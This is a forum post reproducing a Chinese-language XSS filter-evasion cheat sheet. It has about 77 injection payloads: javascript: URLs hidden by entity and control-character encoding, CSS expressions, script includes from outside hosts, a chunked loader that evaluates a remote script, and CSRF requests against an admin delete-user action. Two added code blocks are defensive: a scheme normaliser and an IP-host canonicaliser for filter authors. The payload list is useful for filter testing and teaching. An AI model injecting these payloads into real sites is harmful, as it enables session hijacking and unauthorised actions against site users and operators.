There seems to be little XSS material on t00ls, so I'm copying over something good I found, in case any of you want to bookmark it.

(This is a Chinese rendering of RSnake's ha.ckers.org XSS cheat sheet with the example host changed to 3w.org. Two things to keep in mind while reading it: most of the javascript: in SRC/BACKGROUND/LOWSRC/DYNSRC, CSS expression(), vbscript: and .htc vectors only fire in IE6/7-era engines and are refused by modern browsers; they remain useful as filter tests, because a filter that misses them almost always misses the event-handler and <SCRIPT> forms too. Secondly, the copy this was taken from had eval/expression mangled into eval_r/expression_r and smart quotes substituted for straight ones by a blog filter; both are restored below.)

(1) Plain XSS via a JavaScript include
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag with a javascript: URL (the original post repeated the SCRIPT payload here by mistake; the point of this entry is the javascript: scheme in SRC)
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no attribute quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, the scheme is case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (decimal character references, with semicolons). The post showed only the decoded form <IMG SRC=javascript:alert("XSS")>; the vector is the whole javascript: URL written as references:
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode, so no quotes of any kind are needed (use a charset calculator to produce the codes)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode (decimal) encoding, as in (5) but without the semicolons (use a calculator; the post omitted the encoded body)
<IMG SRC=jav...omitted...S')>

(9) 7-digit padded decimal encoding, also without semicolons. This often beats filters that look for "&#XX;", because few people know a reference may be padded to seven digits (use a calculator; the post omitted the encoded body)
<IMG SRC=jav...omitted...S')>

(10) Hex encoding, also without semicolons (use a calculator; the post omitted the encoded body)
<IMG SRC=java...omitted...XSS')>

(11) Embedded tab splitting the scheme. The gap below is a literal tab character (0x09), not a space:
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab splitting the scheme
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injection, the extreme version of (11)-(14): every character of the tag is placed on its own line, the separators being tab, LF or CR rather than spaces. Collapsed onto one line it is simply
<IMG SRC="javascript:alert('XSS')">

(16) Beating an input length limit. Each fragment is a separate injection, but all of them must land on the same page in order; the last one evaluates the assembled string
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte inside the scheme (the \0 must be an actual 0x00 byte, hence the perl)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte inside the tag name. Null bytes basically don't work in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters in front of the javascript: in IMG SRC (the post lost the &#14; reference)
<IMG SRC=" &#14;  javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS: the parser accepts any non-alphanumeric character after the tag name in place of whitespace
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2, protocol-relative URL
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons: a regex literal supplies the string
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Breaking out of a JavaScript string when the application escapes quotes with a backslash
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image (the post dropped the TYPE attribute)
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag with an event handler (the post's filter ate the attribute; this form needs neither javascript: nor <SCRIPT>)
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) Stylesheet LINK with a javascript: URL
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet (the remote CSS carries the XSS)
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with vbscript: (IE only; the post had the tail of (39) pasted onto this line)
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with a javascript: URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character between the open parenthesis and the javascript: directive. Any of decimal 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279 works; hex and padded references work as well (the post lost the &#1; reference)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
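Items (5), (8)-(14), (17), (19) and (47) are all the same trick, hiding the string javascript: from a filter behind character references and control characters that the browser removes before it looks at the scheme. The following block is an added example, not code from the original post or from the cheat sheet: it generates those encoded forms from a plain payload and then shows the normalisation a server-side filter has to apply (decode numeric references, strip ASCII controls and spaces, lower-case) before a scheme check means anything. The payload strings inside it are constructed test inputs.

```javascript
// Added example, not part of the original post. Produces the encoded forms
// of a javascript: URL used in items (5), (8)-(14), (17), (19) and (47), and
// the normalisation a filter must do before it can recognise the scheme.
// All inputs are constructed.

// Decimal character references: "j" -> "&#106;". semicolon=false gives the
// "no semicolon" variant (item 8), pad=7 the 7-digit padded one (item 9).
function decimalEntities(str, { semicolon = true, pad = 0 } = {}) {
  return Array.from(str, (ch) => {
    const code = String(ch.codePointAt(0)).padStart(pad, "0");
    return "&#" + code + (semicolon ? ";" : "");
  }).join("");
}

// Hex character references: "j" -> "&#x6A;" (or "&#x6A" without ';', item 10).
function hexEntities(str, { semicolon = true } = {}) {
  return Array.from(str, (ch) => {
    const code = ch.codePointAt(0).toString(16).toUpperCase();
    return "&#x" + code + (semicolon ? ";" : "");
  }).join("");
}

// Quote-free JavaScript expression that evaluates to str (item 7).
function fromCharCodeExpr(str) {
  const codes = Array.from(str, (ch) => ch.codePointAt(0));
  return "String.fromCharCode(" + codes.join(",") + ")";
}

// Browser-side decoding of numeric references in an attribute value. The
// ';' is optional and leading zeros are ignored, which is why the padded
// forms work. Named references (&colon; etc.) are not handled here; a
// production filter needs a complete HTML entity decoder.
function decodeNumericRefs(value) {
  const toChar = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => toChar(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => toChar(parseInt(d, 10)));
}

// Normalise the way a filter should: decode references, then drop every
// ASCII control character and space (NUL for item 17, tab/LF/CR for 11-14,
// &#14; for item 19, the 1-32 range for item 47). Dropping all of them
// everywhere is more aggressive than any single browser, which is the
// right direction for a deny-list check.
function normaliseUrl(value) {
  return decodeNumericRefs(value).replace(/[\u0000-\u0020]/g, "").toLowerCase();
}

// Does the attribute value resolve to a script-executing scheme?
function isScriptUrl(value) {
  return /^(javascript|vbscript):/.test(normaliseUrl(value));
}

// End-to-end check: every encoding of the payload must still be detected.
function allVariantsDetected(payload = "javascript:alert('XSS')") {
  const variants = [
    payload,
    "JaVaScRiPt:alert('XSS')",
    decimalEntities(payload),
    decimalEntities(payload, { semicolon: false }),
    decimalEntities(payload, { semicolon: false, pad: 7 }),
    hexEntities(payload, { semicolon: false }),
    "jav&#x09;ascript:alert('XSS')",
    "jav&#x0A;ascript:alert('XSS')",
    "jav&#x0D;ascript:alert('XSS')",
    " &#14;  javascript:alert('XSS');",
    "java\u0000script:alert('XSS')",
    "&#1;javascript:alert('XSS')",
  ];
  return variants.every(isScriptUrl);
}
```

The design point is the order of operations: decode first, strip second, compare last. A filter that matches on the raw attribute value, or that strips whitespace before decoding, is beaten by every one of the variants in the list, which is exactly what entries (5) through (19) are demonstrating.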
(48) DIV with a CSS expression (IE)
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with an unknown property carrying the expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (any tag name will do: an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image applied through a class
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with the expression split by CSS comments. This shows how hard STYLE is to parse safely: a filter that strips /* ... */ comments leaves exactly the tail the post preserved, exppression(alert("XSS"))'>. The full vector is
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

(53) STYLE background (the post had a stray extra <STYLE> in front)
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE tag
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag loading a Flash movie that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash file that assembles the XSS at runtime
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace with an HTC behaviour. The .htc file must sit on the same server as the page carrying your XSS
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JavaScript is filtered by file type, put the JavaScript in a file with an image extension and include it with SCRIPT SRC; the browser only cares about the content (the post left the SRC empty)
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded request. The browser sends the victim's cookies along with the image request, so if the page sits behind a login, an authenticated action on that site runs in the victim's name (delete or add users, change credentials). This is CSRF rather than "arbitrary command execution"
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded request through a redirect, for when the target URL itself is filtered: a.jpg lives on your own server, and an Apache redirect rule sends the browser on to the real action
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Getting past filters that look for ">": an attribute value that contains the character
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67) Splitting the tag across a document.write
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL string evasion, plain form; the following entries rewrite the host so a string match on it fails
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL (percent) encoding of the host (the post showed the decoded form)
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) IP address as a single decimal integer (3232235521 is 192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding, with tabs and newlines inside the URL (\n and \t below stand for a literal newline and tab character; the host resolves to 66.102.7.147)
<A HREF="h\ntt\tp://6\t6.000146.0x7.147/">XSS</A>
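Entries (70)-(73), and the trailing-dot form in (76), all defeat the same weak control: an allow-list or deny-list that compares the host as a string. The block below is an added example, not code from the post or from the cheat sheet: it resolves the decimal, hex, octal and mixed spellings to a dotted quad the way the browser's URL parser does, strips the tab/LF/CR characters the parser ignores, and compares canonical hosts. The URLs in it are constructed test inputs.

```javascript
// Added example, not part of the original post. Resolves the host
// spellings in items (70)-(73) to a dotted quad and canonicalises hosts
// so an allow-list cannot be bypassed by re-spelling the address.

// One dotted part: decimal, "0x" hex, or leading-zero octal. Returns NaN
// for anything that is not a number, in which case the host is a name.
function parseIPv4Part(part) {
  let radix = 10;
  let digits = part;
  if (/^0x/i.test(part)) {
    radix = 16;
    digits = part.slice(2);
  } else if (part.length > 1 && part[0] === "0") {
    radix = 8;
    digits = part.slice(1);
  }
  if (digits === "") return radix === 10 ? NaN : 0; // "0x" on its own is 0
  const valid = { 10: /^[0-9]+$/, 8: /^[0-7]+$/, 16: /^[0-9a-f]+$/i }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : NaN;
}

// "3232235521", "0xc0.0xa8.0x00.0x01" and "0300.0250.0000.0001" all become
// "192.168.0.1"; "66.000146.0x7.147" becomes "66.102.7.147". With fewer
// than four parts the last part fills the remaining bytes, as in the URL
// Standard. Returns null when the host is not an IPv4 literal.
function ipv4ToDottedQuad(host) {
  const parts = host.split(".");
  if (parts.length > 1 && parts[parts.length - 1] === "") parts.pop();
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = parts.map(parseIPv4Part);
  if (nums.some(Number.isNaN)) return null;
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;
  let value = last;
  for (let i = 0; i < nums.length - 1; i++) value += nums[i] * 256 ** (3 - i);
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join(".");
}

// Canonical host of a URL: remove the tab/LF/CR the URL parser ignores
// (item 73), accept protocol-relative URLs (items 25 and 74), drop userinfo
// and port, remove the absolute-DNS trailing dot (item 76), lower-case,
// and resolve IPv4 literals. IPv6 literals are out of scope here.
function canonicalHost(url) {
  const cleaned = url.replace(/[\t\n\r]/g, "");
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^/?#]*)/i.exec(cleaned);
  if (!m) return null;
  let host = m[1];
  host = host.slice(host.lastIndexOf("@") + 1);
  host = host.replace(/:\d*$/, "").replace(/\.$/, "").toLowerCase();
  if (host === "") return null;
  return ipv4ToDottedQuad(host) ?? host;
}

// Allow-list check that compares canonical forms, never raw strings.
function hostAllowed(url, allowed) {
  const host = canonicalHost(url);
  return host !== null && allowed.includes(host);
}
```

The lesson for a filter author is that (70)-(73) are not four separate bypasses to pattern-match but one missing step: parse the URL with the same rules the browser uses, then compare the result. The reverse holds for a pentester: if an allow-list accepts 192.168.0.1 but rejects 3232235521, it is comparing strings and every other spelling is worth a try.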
(74) Dropping http: (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>

(75) Dropping www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>